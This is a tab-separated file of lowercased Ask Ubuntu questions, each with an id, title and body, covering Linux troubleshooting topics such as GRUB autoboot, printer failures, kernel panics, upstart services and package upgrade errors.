372157	automount aduc defined home folders on logon	-- just to prefice this post , i 'll say that i 'm a huge novice when it comes to anything linux based , so the more detail the better -- i have a laptop running ubuntu and i 've been trying to utilize centrify to authenticate users from our windows domain to the laptop . so far i 've been able to accomplish that . however , i would really like to have a users aduc defined home folder mapped on logon . i 've been fallowing this thread ( http : //community.centrify.com/t5/directcontrol-express-for-unix/automounting-home-directories-defined-in-ad/td-p/1044 ) on the centrify community forums about mounting a users home directory . if you scroll down to a post by ilau , he has provided a script that should accomplished this . i 've reached this part of his steps 2. chmod +s which smbmount 3. chmod +s which smbumount and i 'm completely lost . i 'm not exactly sure what hes looking for me to do in this instance . i know that chmod is used for changing permissions , but is he looking for me to run this against an smb share that i have on my network ? also , if anyone has any alternative solutions that you use or have used to mount a users aduc defined home folder i 'm all ears .
372164	how to load ubuntu server automatically in grub	this is my /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' but when i have a power failure , then the ubuntu server 12.10 stays at this screen . i 've tried to solve it editing grub but does n't seem to have an affect . since i do n't have display attached , i need it to start automatically ubuntu every time . thanks !
372166	how can i change git history ( git rebase -i ) after i did a git push	how can i do a git rebase -i after i do a git push ? i read that i ca n't edit history after i do git push .
372168	how to hibernate an ubuntu in aws ?	i am trying to hibernate an ubuntu 12.04 in a vm stored in aws ec2 but the hibernation process is not working . the hibernation process seems to be done correctly but i get an error when the vm tries to read the image . i am using pm-utils for that . i have created a swap partition with enough space to store the whole ram and more . any idea if it is possible in aws ec2 ? thanks
372173	how do i add another main user in xubuntu with gksu ?	i want to add another main user that has sudo rights to do everything on my system . how can i start the `` users and groups '' application without using that name ? because i have a rights problem on my computer , i can not start it as the main user , only with gksu what is the internal name of that program ?
372176	how do i get internal names of gui programs ?	i want to find out what is the internal name of a graphical running program . i know it can be found in ps aux or top but is there a way to find out without console with the mouse ? maybe an app i can start and then click on a window to see its application name ?
372180	error message during update from 13.04 to 13.10	the following was reported after i attempted to report the problem back to ubuntu : the problem can not be reported : you have some obsolete package versions installed . please upgrade the following packages and check if the problem still occurs : ubuntu-release-upgrader-gtk , apport , apport-gtk , apport-symptoms , apt , apt-utils , at-spi2-core , binutils , dbus , gcc-4.7-base , gdb , gir1.2-atk-1.0 , gir1.2-gtk-3.0 , glib-networking , glib-networking-common , glib-networking-services , gnupg , gpgv , ifupdown , initramfs-tools , initramfs-tools-bin , kmod , libappindicator3-1 , libapt-inst1.5 , libapt-pkg4.12 , libasound2 , libatk-bridge2.0-0 , libatk1.0-0 , libatk1.0-data , libatspi2.0-0 , libc-bin , libc6 , libcups2 , libdbus-1-3 , libdbusmenu-glib4 , libdbusmenu-gtk3-4 , libdrm-intel1 , libdrm-nouveau2 , libdrm-radeon1 , libdrm2 , libgail-3-0 , libgcc1 , libgcrypt11 , libglib2.0-0 , libglib2.0-data , libgnutls26 , libgomp1 , libgstreamer-plugins-base1.0-0 , libgstreamer1.0-0 , libgtk-3-0 , libgtk-3-bin , libgtk-3-common , libgudev-1.0-0 , libicu48 , libindicator3-7 , libkmod2 , liblcms2-2 , libpci3 , libplymouth2 , libpolkit-agent-1-0 , libpolkit-backend-1-0 , libpolkit-gobject-1-0 , libprocps0 , libpython-stdlib , libpython2.7 , libpython2.7-minimal , libpython2.7-stdlib , libpython3-stdlib , libpython3.3-minimal , libpython3.3-stdlib , libssl1.0.0 , libstdc++6 , libtiff5 , libudev1 , libx11-6 , libx11-data , libx11-xcb1 , libxcb-dri2-0 , libxcb-glx0 , libxcb-render0 , libxcb-shm0 , libxcb1 , libxcursor1 , libxext6 , libxfixes3 , libxi6 , libxinerama1 , libxml2 , libxrandr2 , libxrender1 , libxres1 , libxt6 , libxtst6 , libxxf86vm1 , lsb-base , lsb-release , module-init-tools , multiarch-support , openssl , passwd , pciutils , perl , perl-base , perl-modules , plymouth , plymouth-theme-ubuntu-text , policykit-1 , procps , python , python-gi , python-minimal , python2.7 , python2.7-minimal , python3 , python3-apport , python3-distupgrade , python3-gi , python3-minimal , python3-problem-report , python3-software-properties , python3-update-manager , python3.3 , python3.3-minimal , rsyslog , shared-mime-info , software-properties-common , software-properties-gtk , tar , tzdata , ubuntu-release-upgrader-core , ubuntu-release-upgrader-gtk , udev , update-manager , update-manager-core , update-notifier , update-notifier-common if this question has already been answered , i 'm sorry for the repost , but i would appreciate a link to the fix . thanks . fyi : dell latitude d630 , intel centrino processor . also , the updater is currently running what seems to be the update . i will report back when it is done going through its process to let you know if it is in fact the 13.10 update . update 2 : system went through an update , but it was n't for the os . i think it was an update for the error message mentioned above . now the os update is currently running the 'distribution upgrade ' portion of the update . this is further than it had gone before . again i will report back once this is done to let you know whether or not the update was successful . final update : do n't know for sure what happened , but i 'm almost sure that the error mentioned above was resolved in the first update prior to the 13.10 update . all set .
372181	how do i allow sftp with a password but not ssh ?	i have ssh keys set up for every user with which they ssh into the proper machines . the problem is that many ftp programs dont support ssh login . therefore , only for ftp do i want to allow users to login with a password . how do i achieve this ?
372187	12.04 `kernel panic not syncing io-apic + timer does n't work`	i downloaded ubuntu 12.04 lts onto my pendrive using the program recommended . after rebooting the system it showed this error : [ 0.032000 ] kernel panic-not sycning : io-apic + timer does n't work . try booting with apic=debug and send a report . then try booting with the 'noapic'option [ 0.032000 ]
372191	amazon mp3 download not quite working	i 'm trying to download amazon mp3s . i followed the guide here : how do i import amazon mp3s with banshee and the new amazon cloud player ? and was able to get it to seemingly let me do the download , but at the point where i would have expected a .azm file to download it instead gave me the error : the address was n't understood firefox does n't know how to open this address , because the protocol ( amazoncloudplayer ) is n't associated with any program . you might need to install other software to open this address . with the url bar showing : amazoncloudplayer : //launch does anyone have any idea how to get past this ? the best i can guess is that it should have launched banshee at this point , and that banshee is n't associated as a handler . i am not sure how to set this up . alternatively , maybe amazon broke everything yet again . any ideas very welcome !
372194	how to make ctrl+super+left/right work in virtual box ubuntu 12.04 ?	i use ubuntu 13.10 as a development machine and found that buttons ctrl+super+left/right are quite useful for me . from time to time i 'm working on ubuntu 12.04 installed on virtual box and unfortunately they are not working there . i read and internet and found that it 's because 2d mode , i tried to change it over compiz setting manager , but it 's still not working . how to make ctrl+super+left/right put the window left or right in ubuntu 12.04 vb at 2d mode ?
372197	why is the keyboard repeat rate so high for ctrl , and can i change it to the default rate ?	i use my right ctrl key for delete by having xmodmap -e `` keycode 105 = delete '' in my .bashrc , where 105 is the keycode for my right ctrl . today i tried to get it to repeatedly activate when held using xset r 105 that works , but the key now deletes things very , very fast ! i tried changing a normal key ( hyphen , currently set to delete ) to delete , and it deletes with normal speed . as i am both curious and would like a solution , my question is twofold : 1 ) why does ctrl delete faster than my normal delete key and other keys set to delete , and 2 ) can i slow it down to the same speed as the other keys ?
372198	terminal unable to generate en_in.iso8859-1 ?	whenever i am trying to generate locale using sudo locale-gen en_in.iso8859-1 the system is not doing anything .
372199	ubuntu 13.04 does n't boot up once in a while	i realize my question has been asked before , usually phrased as `` sometimes ubuntu does n't boot '' , but after reading some of the other questions and answers , i think my situation is a bit more complicated . the problem : about once every 5 , maybe 10 times i turn on my computer and chose to boot ubuntu , it does n't boot , but the screen turns `` purple '' or perhaps more precisely : it 's empty/black , but backlight is on as far as i can tell . in this state , i can do absolutely nothing . ctrl alt f1 to switch to a terminal does n't work , so in the end , i have to force a power-down by pressing the power button . my setup : i dual boot ubuntu 13.04 , 64 bit , and windows 7 sp1 , on a lenovo ideapad u310 . the u310 has both an ssd and a hdd . ubuntu 's root directory and swap partition are on the ssd , my home folder and windows are on the hdd . some additional info : the grub menu appears always , and i can chose whether i want to boot windows or ubuntu . the problem appears ( sometimes ) after i chose to boot ubuntu -- the screen becomes black/purple , nothing else on it , and it stays like that indefinitely . any idea what could be the cause for that ? if necessary , i can read/attach log files that might help discovering what the problem is , but i did n't know which log file to look into . any help would be appreciated .
372203	how to stream music to shoutcast radio from xubuntu 13.10 ?	what i want : i want to be able to stream music and microphone on the ubuntu system to some radio on shoutcast server . i have : music , computer , mic . nothing else : d any help , i tryed to figure it out by only myself but im new to linux . using xubuntu 13.10 .
372204	can i install ubuntu on a the toshiba c55ta touch screen ?	can i install ubuntu on a the toshiba c55ta touch screen ? if yes should i install 12.04 or 13.10 ? it has win 8 64bit and runs fine
372210	dvb-c card on a server	i 'm setting up a ubuntu `` server '' ( old pc , athlon x2 ) for the entire house . mainly it 's supposed to be a file- and media-server which can be done without a gui . there 's a connection for cable tv in the `` server room '' . i wondered if it is possible to equip the server with a dvb-c card and use it to record tv and radio broadcasting . or even better , to distribute the recordings over ethernet to other pcs ( all different systems , mainly windows 7 and mac os ) . if such a distribution were possible would it result in a decreasing audio and video quality ? thanks in advance , markus
372212	how do i add the unallocated space to my ubuntu installation after deleting the windows xp partition ?	i just deleted the windows xp partition in the ubuntu live cd because i do n't use windows xp anymore , now i have this i want to add the remaining space to my ubuntu installation and make ubuntu boot on startup .
372213	hp printer installs , but no longer prints jobs sent to it after upgrading to ubuntu 13.10	i just updated from ubuntu 13.04 to ubuntu 13.10 and can no longer print via my hp laser jet p1006 printer . the printer driver is installed and the printer is listed as a print option , but when a print job is sent to it , a 'click ' is heard and nothing prints . this job remains in the queue . i have been using ubuntu and debian linus for years and have never had any trouble with using hp laser jet printers . help .
372214	wireless ( wifi ) antenna wo n't work after installing ubuntu 12.4 64 bit on toshiba laptop	i have tried 2 different additional drivers from the ubuntu software center , they have not worked . everything else works great but the wifi antenna will not work . i have to use a patch cord to connect to the internet . this really sucks ! ! i love ubuntu and hate the windows 8 i replaced it with ! i just want my wireless fixed but i am out of ideas !
372215	changing suspend timer to more than 1 hour	in ubuntu 13.10 , i want to change my suspend timer to go to sleep after 3 hours , but in system settings i can not do that . i 'm wondering is there any way to set it ? i 've already tried the instructions in this question : enabling longer period of inactivity before suspending
372216	create new terminal commands	i recently installed eclipse the manual way . extracting the file , setting up eclipse.desktop etc . it all works flawlessly . i also know it is possible to install eclipsee using sudo apt-get install eclipse-platform . if i use this method i can use the command eclipse in the terminal , and the program will start . now the manual way i used does not enable the eclipse-command in the terminal . instead if i use eclipse-command it asks me to install eclipse from the softwarecenter ( sudo apt-get install eclipse-platform ) . i wondered if there was some way of setting up a command like this to start eclipse ? if so , can i do it for other programs like apache-maven mvn-command ? i do n't want to use `` aliases '' because i can not setup and eclipse alias , when `` eclipse '' is listed in the apt repository . it seems as if only if i install the eclipse from apt-get install i can start eclipse from a single command in the terminal . i appreciate any help , and thanks in advance !
372218	problem with shutdown the laptop	i 've installed 13.10 on my dell inspiron 1564 and now when i press the shutdown/restart button from the scroll down menu in the upper left corner or even when i try from the terminal sudo halt or sudo reboot it gave me the ubuntu screen then freeze for ever and wont shutdown at all any help to solve this problem ?
372221	lightweight terminal in linux	i am running ubuntu on my not so powerful netbook and do n't want the overhead of gnome or kde . but i want to run a nice terminal . i might have to settle with the text only mode but i am sure there would be a better way out .
372227	clone unity dock for all users ?	i 've spent 3 days trying to figure out how to clone the unity dock from my firstuser profile in ubuntu 12.04 to all of the other profiles i 'm hoping to create . i 've read where the /etc/skel folder contents get populated to all new profiles but this does n't seem to include the dock or the desktop folders and icons . i 've also copied the entire contents of my /home/firstuser folder to my /home/seconduser folder ( including . * files ) but the dock is still showing the stock icons and not the icons i 've designated in my firstuser profile dock . does anyone have any suggestions ?
372231	canon mx772 printer recognized , drivers loaded ... but all print jobs `` held ''	brand new to ubuntu but loving it so far . i have a canon mx772 wireless printing running on my network and am able to print fine from a pc and mac . using the printers ip , ubuntu was able to find it and i accepted all of the `` recommended '' items ( it found a canon mx770 driver ) . everything seems to load fine ... but the test page does not print , nor does any print commands make it to the printer . if i open the print dialogue jobs are shown as `` held '' and when i look at the jobs attributes , i see job printer state message= can not specify model number and then a few lines down job state reasons=aborted by system . if i try to resume it immediately goes back to held . i can successfully ping the ip of the printer . would be very appreciative of other ideas ... printing is the last check in the box before i am all set up . thanks !
372238	how can i enable remote login in 13.10 ?	so far i have tried : checking the appropriate boxes in `` desktop sharing , '' and then trying to log in using my email address from `` remote login '' at the login prompt on a different machine . it does n't seem to work , however . clicking the question mark next to `` remote login '' says that i need an ubuntu remote login account , but then clicking `` set up '' makes the screen go black for a second , then returns me to the login screen .
372239	i ca n't upgrade 13.10 because of broken pipe	i try upgrading and this is what i get : christopher @ chris-computer : ~ $ sudo apt-get upgrade [ sudo ] password for christopher : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : librhythmbox-core7 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/809 kb of archives . after this operation , 39.9 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 170617 files and directories currently installed . ) preparing to replace librhythmbox-core7 2.99.1-0ubuntu1 ( using ... /librhythmbox-core7_3.0.1-0~13.10~ppa1_i386.deb ) ... unpacking replacement librhythmbox-core7 ... dpkg : error processing /var/cache/apt/archives/librhythmbox-core7_3.0.1-0~13.10~ppa1_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/librhythmbox-core.so.8.0.0 ' , which is also in package librhythmbox-core8 3.0.1-1ubuntu2~ppa0 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/librhythmbox-core7_3.0.1-0~13.10~ppa1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
372240	after upgraded to 13.10 , two little split ubuntu logo screen after login	after upgrading from 13.04 to 13.10 the screen splits into two small screens of the ubuntu logo , side by side after login and freeze there . everything worked fine at 13.04 .
372241	the little search thing wont work anymore	i never had a problem with this before but today when i tried to use that app , the one that says `` search your computer and online sources '' when you hover over it , it wont find anything useful . it wont find stuff i know i have on my computer ( like files or programs ) but it keeps finding crap i do n't think i even have on my computer and has nothing to do with what i typed in to search . i get `` ask ubuntu '' but other than that , even if i search something that i know it has found in the past , it just returns useless reference crap and a lot junk that does n't have much to do with what i was looking for . how do i make it search properly again ?
372244	unable to resolve dh-modaliases	i installed ubuntu 13.10 . i have issue that my gui is really slow . so i 'm trying to install new drivers to ati radeon hd 6310 . i downloaded driver and trying to compile it sudo sh amd*.run -- buildpkg ubuntu/saucy it starts all process , but after few seconds i 'm getting unable to resolve dh-modaliases . please manually install and try again . i google it but i could n't find anything what could tell me where i could find this package .
372245	cairo dock and unity	when i try to select a session for my cairo dock it only offers me cairo dock ( gnome ) and the default ubuntu session . i was wondering how do i get it to offer me cairo dock with unity and the other sessions . i 'm running ubuntu 13.10 thank you in advance .
372246	upstart services all hang when stopping ( stop/waiting )	i am using ubuntu 13.10 after an ipl , there are many run once services that hang , they are all in stop/waiting status . also , if i try to stop any normal service like apache2 , mysql , vsftp i get the same results . they are in upstart and i have used the commands : stop apche2 service apache2 stop /etc/init.d/apache2 stop all three variations produce the same results , when i type in initctl list i get the service is stop/waiting and the process is still going strong . i see the process running and it works great for new connections . i am running the stop commands from root . there are no entries in any of the logs about the stop command or errors for each service . how to fix this ?
372247	manual bootstrapping with juju on vps	i recently bought a vps ( openvz ) with ubuntu 13.04 . lately i 've read about juju and i thought it would match my needs on my brand new vps as i want to easily configure hadoop , wordpress , graphite and other services . i tried the juju-local approach but i got an error while installing it : http : //paste.ubuntu.com/6373143/ so i got to # juju irc channel and i was told to use `` manual bootstrapping '' and create a question here in order to get more info as it seems is something under development . could anybody help me getting juju to work on my vps ? did any had the same problem ? thanks in advance ! edit : after some more research ( and after reading my own question ) i think i should clarify a little more the situation . what i want is a manual provider to allow me manage my vps from juju . i know there might be a work in progress and i would appreciate any info regarding it 's state and any possible solution : )
372248	downloaded g++ 4.8 from the ppa but ca n't set it as default ?	i have downloaded g++ 4.8 on ubuntu 12.10 by doing : sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install g++-4.8 but when i do : sudo update-alternatives -- config g++ to switch g++ versions it says : update-alternatives : error : no alternatives for g++ . however if i do : g++ -- version it says : g++ ( ubuntu/linaro 4.6.3-1ubuntu5 ) 4.6.3 copyright ( c ) 2011 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . how do i set my g++ 4.8 installation to be the default g++ ?
372249	vaio webcam r5u87x	i have issues with a sony vaio webcam.and yes i tried the whole r5u87x fix . apparently the last step fails in a error : failed to find any supported webcams . any help will be appreciated . backinfo : lsusb outputs shows no signs of an intergrated camera /dev has no video0 link for fix also i am finding it quite hard to get any info on what type of camera chipset is being used . it 's a vaio pcg-71c12l
372253	how to change package configuration background/colors ?	i want to change these colors : package configuration can anyone help me ?
372257	wired connection keeps disconnecting	the wired connection to a netgear ds104 hub keeps disconnecting . it has never been able to maintain connection on this system . i have never run this hub on unix but it functions without issue on windows . please specify logging and configuration packages relevant to linux networking . please specify a solution to maintaining a connection dmesg | tail ; lsb_release -a ; uname -a [ 85.217906 ] type=1400 audit ( 1383697555.735:39 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/lib/telepathy/mission-control-5 '' pid=2836 comm= '' mission-control '' pid=2836 comm= '' mission-control '' capability=23 capname= '' sys_nice '' [ 302.485594 ] type=1400 audit ( 1383697772.613:40 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=1236 comm= '' cupsd '' pid=1236 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 398.886608 ] type=1400 audit ( 1383697869.046:41 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=1236 comm= '' cupsd '' pid=1236 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 422.615523 ] type=1400 audit ( 1383697892.782:42 ) : apparmor= '' denied '' operation= '' capable '' parent=3799 profile= '' /usr/lib/telepathy/mission-control-5 '' pid=3800 comm= '' mission-control '' pid=3800 comm= '' mission-control '' capability=23 capname= '' sys_nice '' [ 1249.187062 ] type=1400 audit ( 1383698719.628:43 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=1236 comm= '' cupsd '' pid=1236 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 25182.283648 ] postgres ( 17302 ) : /proc/17302/oom_adj is deprecated , please use /proc/17302/oom_score_adj instead . [ 73672.207532 ] r8169 0000:01:00.0 eth0 : link up [ 73672.207553 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 80034.553476 ] r8169 0000:01:00.0 eth0 : link down [ 80107.283453 ] r8169 0000:01:00.0 eth0 : link up no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise linux inspiron-3521-ub 3.8.0-32-generic # 47~precise1-ubuntu smp wed oct 2 16:19:35 utc 2013 x86_64 x86_64 x86_64 gnu/linux ifconfig eth0 link encap : ethernet hwaddr 74:86:7a:0f:07:67 inet6 addr : fe80 : :7686:7aff : fe0f:767/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:2351 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:533433 ( 533.4 kb )
372262	software updater does not show updates but apt-get upgrade shows some	after installing updates using software updater i noticed that apt-get upgrade still offers some additional updates : $ sudo apt-get upgrade [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : python-cupshelpers system-config-printer-common system-config-printer-gnome system-config-printer-udev 4 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 223 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? i saw this situation for the third time already since installing xubuntu 13.10 . why does software updater neither show nor install these updates offered by apt-get upgrade ?
372263	accessing columns 5-8 of xmodmap	if i do xmodmap -pke , my output starts as follows - keycode 8 = keycode 9 = escape nosymbol escape keycode 10 = 1 exclam 1 exclam exclamdown u2044 exclamdown keycode 11 = 2 at 2 at trademark eurosign trademark aiui the first keysym is obtained by pressing , the second with shift , the third with mode_switch and the fourth with mode_switch and shift . but what about columns 5-8 ?
372264	anything that requires flash looks green and purple , and small	hi i am new to the ubuntu community and operating system ( ubuntu 12.04 ) . after having recommended from my compute programming teacher , i decided to install it . i 'm satisfied with the operating system except for the adobe flash plug-in . anything that requires flash looks green and purple , but anything that has audio comes through just fine similar to this user 's issue : purple and green screen when watching video on youtube ? no one seems to have provided any one with a sufficient answer so i have decided to ask again . i have tried many things including going to the terminal and copying and pasting that install flash command . i 've even decided to use lightspark ( although i 'm not sure if i did it right ) . nothing seems to work . i can watch you-tube videos using html5 however many other video players require adobe flash . please list any and all techniques that could help me in this situation . the only thing i have n't tried so far is try to disable my hardware acceleration , which i do n't know how to do .
372267	upstart kills all process started by script	so i use upstart [ myscript ] to start a script [ a ] , which starts another script [ b ] , which in turn starts some other scripts [ group c ] . when i run stop [ myscript ] , i encounter the unusual behavior where [ group c ] is also stopped . every script in [ group c ] has been started with a & , and are running in the background . i am surprised that they are also killed by the stop [ myscript ] command . why is this , and how to i prevent it from happening ? edit : basically [ myscript ] is as follows : pre-start script echo 'starting myscript daemon\n' end script script exec /foo/bar/myscript-start.sh end script post-stop script echo 'and apparently we are done ... .' end script
372273	hp envy 6 ultrabook touchpad wont use the gestures	i quit windows 8 for ubuntu on my hp envy 6 ultrabook , but the touchpad wo n't work properly ( i ca n't zoom in/out ) . in the settings there are no functions for zoom . how do i fix it ?
372278	kernel panic after updating to linux kernel 3.8.0-32	i 'm getting the following errors after upgrading to the newest kernel : vfs : can not open root device `` uuid=1f09d896-51ad-47b8-8e62-c289906e527a '' in unknown-block ( 0,0 ) please append a correct `` root= '' boot option ; here are the available partitions : and kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) it allows me to boot if i change root=/dev/sdc2 i 've tried re-installing the kernel as well running sudo update-initramfs -u -k all and sudo update-grub2 i 've confirmed it 's the correct uuid in the fstab etc . # / was on /dev/sdc2 during installation uuid=1f09d896-51ad-47b8-8e62-c289906e527a / ext4 errors=remount-ro 0 1 i 'm also able to boot from previous versions . google has pretty much run out of results for me to try now . help me askubutu , you 're my only hope .
372282	how to use bumblee with nvidia geforce gt 750m ?	for the life of me i can not get bumblee to work with my graphics card . i attempted to follow this thread to no avail , along with every other thread you get when you google `` bumblebee gt 750m '' . has anyone found away to use it with the gt 750m ? i do n't so much have a problem with my graphics performance but with the power suck . i have tried to just load bbswitch , but after i make the file , and attempt to use modprobe i get this back : error : could not insert 'bbswitch ' : no such device i am running ubuntu 13.04 on an asus nv550jv does anyone have any solution ? or any way to toggle my graphics card 's power state ? thanks .
372283	upstart logs missing	i have been trying ( unsuccessfully ) to automate a script ( or at least the actions contained within ) that i run in terminal each time a reboot my system , to enable the wifi . i have been following as many of the responses on this forum as to how to autommate actions at startup as i can and focused most of my attention around using upstart . since there is no apparent sign that my script ( or any derivation i can come up with ) has run i decided i needed to turn debug logging on in initctl and watch what happens with my `` script '' when events get triggered . low and behold , initctl is not writing to /var/log/syslog . where is it writing to and/or why is it not writing there ? i have a directory in /var/log called upstart but all that is in that directory is archive files . for the record i 'm running 13.04 with the latest updates applied .
372284	what does it mean if `which x` finds something but executing `x` fails ?	specifically python : $ which python /usr/bin/python $ ll `which python` lrwxrwxrwx 1 root root 9 jun 18 10:26 /usr/bin/python - > python2.7 $ python the program 'python3 ' is currently not installed . $ ll /usr/local/bin/python ls : can not access /usr/local/bin/python : no such file or directory $ whereis python python : /usr/bin/python /usr/bin/python2.7 /etc/python /etc/python2.7 /usr/lib/python2.7 /usr/bin/x11/python /usr/bin/x11/python2.7 /usr/local/lib/python2.7 /usr/include/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz $ python2.7 python 2.7.3 ( default , sep 26 2013 , 20:03:06 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > i do n't understand why python wo n't run python2.7 here -- is n't the symlink pointing to python2.7 ?
372290	apt-get update : unable to change to ( unreachable ) // - chdir ( 2 : no such file or directory )	today i have tried to update the package lists and i have encountered strange error $ sudo apt-get update ... ign http : //archive.ubuntu.com saucy-security/universe translation-en_us ign http : //archive.ubuntu.com saucy-proposed/main translation-en_us ign http : //archive.ubuntu.com saucy-proposed/restricted translation-en_us ign http : //archive.ubuntu.com saucy-proposed/universe translation-en_us fetched 496 kb in 38s ( 13.0 kb/s ) e : unable to change to ( unreachable ) // - chdir ( 2 : no such file or directory ) what should i change now ? something in /etc/apt/sources.list ?
372292	netbeans not opening ubuntu 13.10	when i try to run netbeans it says `` loading cached objects '' then the screen goes away . i have tried uninstalling it and reinstalling it . but it did n't help
372293	touch pad suddenly stopped working even on windows . how to know wether it 's a hardware problem ?	i do n't know exactly when it stopped working because i use an usb mouse , but i know it was yesterday . my laptop was turned on about 20 hours because i use it to do geometry minimization ( computational chemistry ) . yesterday around the noon i was using the touch pad normally in the college , then i went home , but , due to i need to keep the laptop turned on , i put it on my backpack taking care that the heat was being released correctly . once in home i plugged the usb mouse , and around the evening i noticed that the sound and the touchpad were not working , i thought it would be solved restarting the laptop , and in fact it did solve the sound problem , but the touch pad still not working . in systems settings the touchpad 's tab does n't show anymore though i can see the mouse 's tap yet . i got this when running xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft microsoft basic optical mouse v2.0 id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sony vaio keys id=9 [ slave keyboard ( 3 ) ] ↳ power button id=10 [ slave keyboard ( 3 ) ] ↳ sleep button id=11 [ slave keyboard ( 3 ) ] ↳ usb keyboard id=13 [ slave keyboard ( 3 ) ] ↳ usb keyboard id=14 [ slave keyboard ( 3 ) ] ↳ sony visual communication camer id=15 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=16 [ slave keyboard ( 3 ) ] and as you can see , there is n't `` synps/2 synaptics touchpad '' . it makes me think that this is is a hardware problem and my touchpad is dead .
372294	how do i stop synchronising my files ?	i wish to check my files on-line in ubuntu one , like i used to , not to have to download them .
372295	netflix on ubuntu 12.04	so i have got ubuntu 12.04 on a system 76 lemur ultra laptop . i installed netflix via terminal with the following chain of commands : sudo apt-get update sudo apt-add-repository ppa : ehoover/compholio sudo apt-get update sudo apt-get install netflix-desktop when it was finished installing , i clicked the icon and something came up asking if you want to install some dependent software , but would n't let me interact with the window - so i hit tab and worked my way through that . but my computer shutdown before i could fully install gecko . now i have the netflix icon , but when i click it or right click it nothing happens . i had tried uninstalling it with the following commands , sudo apt-add -- purge remove netflix-desktop and then reinstalling it but there 's no change . does anyone know what i can do to get netflix to run from here ? or what i can do to start troubleshooting ? i searched around on askubuntu but could n't find any answers to this specific problem .
372297	how to delete windows partition from ubuntu	how do i delete windows partition from ubuntu ? i have the fbi virus on my windows partition and need to delete it from ubuntu os .
372298	ubuntu brightness not working	i am using 12.04 in my dell inspiron 3521.it has got amd radeon 7600 and intel graphics.brightness control was working perfectly . after wiping the pre installed 12.04 , i installed new 12.04 recently.now the problem is battery drains very quickly and screen brightness control is not working.battery lasts only for an hour . i have installed additional drivers.but i am no sure whether correct driver installed . i have tried the following solutions , but none of them working . http : //askubuntu.com/a/166472/14384 http : //askubuntu.com/a/128471/14384 http : //thanhsiang.org/faqing/node/180 http : //www.hecticgeek.com/2012/09/ubuntu-12-04-resetting-your-displays-brightness-levels-fix/ any pointers would be helpful .
372299	a lot of crash reports on system start + problem with error reporting	after i have upgraded to 13.10 i receive a lot ( 7 most of the time ) of bug reports on system start like : after this i would receive crash report from apport ( i presume ) that it crashed reporting the error . where can i check what is wrong ? where is the system log in which i would be able to find some info on this ?
